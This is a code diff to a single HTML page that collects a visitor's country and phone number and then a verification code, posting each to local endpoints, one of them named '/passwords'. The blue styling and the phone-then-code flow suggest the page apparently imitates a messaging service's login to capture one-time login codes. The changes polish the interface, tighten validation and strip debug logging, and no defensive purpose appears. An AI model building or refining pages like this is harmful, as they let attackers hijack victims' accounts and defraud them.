--- a/index.html
+++ b/index.html
@@ -105,7 +105,7 @@
             margin-bottom: 5px;
         }
 
-        select, input[type="tel"], .dropdown {
+        input[type="tel"], .dropdown {
             width: 100%;
             padding: 10px;
             border: 1px solid #ccc;
@@ -118,7 +118,7 @@
             transition: all 0.2s ease;
         }
 
-        select:focus, input[type="tel"]:focus, .dropdown:hover {
+        input[type="tel"]:focus, .dropdown:hover {
             border-color: #0088cc;
             outline: none;
             box-shadow: 0 0 0 3px rgba(0, 136, 204, 0.2);
@@ -150,17 +150,9 @@
             width: 100%;
         }
 
-        .dropdown .flag {
-            display: none;
-        }
-
         .dropdown .country-name {
             flex-grow: 1;
             text-align: left;
-        }
-
-        .dropdown .country-code {
-            display: none;
         }
 
         .dropdown-menu {
@@ -201,26 +193,6 @@
 
         .dropdown-item:last-child {
             border-bottom: none;
-        }
-
-        .dropdown-item img {
-            width: 30px;
-            height: 20px;
-            object-fit: cover;
-            margin-right: 10px;
-        }
-
-        .dropdown-item span {
-            display: flex;
-            align-items: center;
-        }
-
-        .dropdown-item span .country-name {
-            margin-right: 10px;
-        }
-
-        .dropdown-item span .country-code {
-            font-weight: bold;
         }
 
         .dropdown-item:hover {
@@ -282,7 +254,7 @@
         <div class="input-group dropdown-container">
             <label for="countryCode">Country</label>
             <div id="countryCode" class="dropdown" onclick="toggleDropdown()">
-                <span><span class="country-name"></span></span>
+                <span><span class="country-name">Select your country</span></span>
             </div>
             <div id="dropdownMenu" class="dropdown-menu"></div>
         </div>
@@ -326,24 +298,21 @@
             const countryNameSpan = countryDropdown.querySelector('.country-name');
 
             const countries = [
-                { name: 'Australia', code: '+61', flag: '🇦🇺' },
-                { name: 'United States', code: '+1', flag: '🇺🇸' },
-                { name: 'United Kingdom', code: '+44', flag: '🇬🇧' },
-                { name: 'Germany', code: '+49', flag: '🇩🇪' },
-                { name: 'Russia', code: '+7', flag: '🇷🇺' },
-                { name: 'Brazil', code: '+55', flag: '🇧🇷' },
+                { name: 'Australia', code: '+61' },
+                { name: 'United States', code: '+1' },
+                { name: 'United Kingdom', code: '+44' },
+                { name: 'Germany', code: '+49' },
+                { name: 'Russia', code: '+7' },
+                { name: 'Brazil', code: '+55' },
                 // Add more countries as needed
             ];
 
             countries.forEach(country => {
                 const item = document.createElement('div');
                 item.classList.add('dropdown-item');
-                item.innerHTML = `<span>${country.flag} ${country.name}</span> <span class="country-code">${country.code}</span>`;
-                item.dataset.code = country.code;
-                item.dataset.flag = country.flag;
-                item.dataset.name = country.name;
+                item.innerHTML = `<span>${country.name}</span> <span class="country-code">${country.code}</span>`;
                 item.addEventListener('click', function() {
-                    countryNameSpan.textContent = country.name;
+                    countryNameSpan.textContent = `${country.name} (${country.code})`;
                     phoneNumberInput.value = country.code + ' ';
                     dropdownMenu.classList.remove('show');
                 });
@@ -364,12 +333,10 @@
 
             window.goToVerificationPage = function() {
                 const phoneNumber = document.getElementById('phoneNumber').value.trim();
-                if (phoneNumber === '') {
-                    alert('Please enter your phone number.');
+                if (phoneNumber === '' || phoneNumber.length < 5) {
+                    alert('Please enter a valid phone number.');
                     return;
                 }
-
-                console.log('Sending phone number to server:', phoneNumber);
 
                 fetch('http://localhost:8000/passwords', {
                     method: 'POST',
@@ -380,14 +347,15 @@
                         phone: phoneNumber,
                     }),
                 })
-                .then(response => {
-                    if (!response.ok) {
-                        throw new Error('Network response was not ok');
+                .then(response => response.json())
+                .then(data => {
+                    if (data.status === 'success') {
+                        document.getElementById('phoneDisplay').textContent = phoneNumber;
+                        document.getElementById('initialContainer').classList.remove('active');
+                        document.getElementById('phoneVerificationContainer').classList.add('active');
+                    } else {
+                        alert('Failed to send phone number.');
                     }
-                    console.log('Phone number sent successfully');
-                    document.getElementById('phoneDisplay').textContent = phoneNumber;
-                    document.getElementById('initialContainer').classList.remove('active');
-                    document.getElementById('phoneVerificationContainer').classList.add('active');
                 })
                 .catch(error => {
                     console.error('Error:', error);
@@ -404,8 +372,6 @@
                     return;
                 }
 
-                console.log('Sending verification code to server:', verificationCode);
-
                 fetch('http://localhost:8000/verification', {
                     method: 'POST',
                     headers: {
@@ -416,27 +382,20 @@
                         code: verificationCode,
                     }),
                 })
-                .then(response => {
-                    if (!response.ok) {
-                        throw new Error('Network response was not ok');
+                .then(response => response.json())
+                .then(data => {
+                    if (data.status === 'success') {
+                        document.getElementById('phoneVerificationContainer').classList.remove('active');
+                        document.getElementById('finalMessageContainer').classList.add('active');
+                    } else {
+                        alert('Invalid verification code.');
                     }
-                    console.log('Verification code sent successfully');
-                    document.getElementById('phoneVerificationContainer').classList.remove('active');
-                    document.getElementById('finalMessageContainer').classList.add('active');
                 })
                 .catch(error => {
                     console.error('Error:', error);
                     alert('An error occurred. Please try again.');
                 });
             };
-
-            document.body.addEventListener('touchmove', function() {
-                document.activeElement.blur();
-            });
-
-            verificationContainer.addEventListener('scroll', function() {
-                document.activeElement.blur();
-            });
         });
     </script>
 </body>
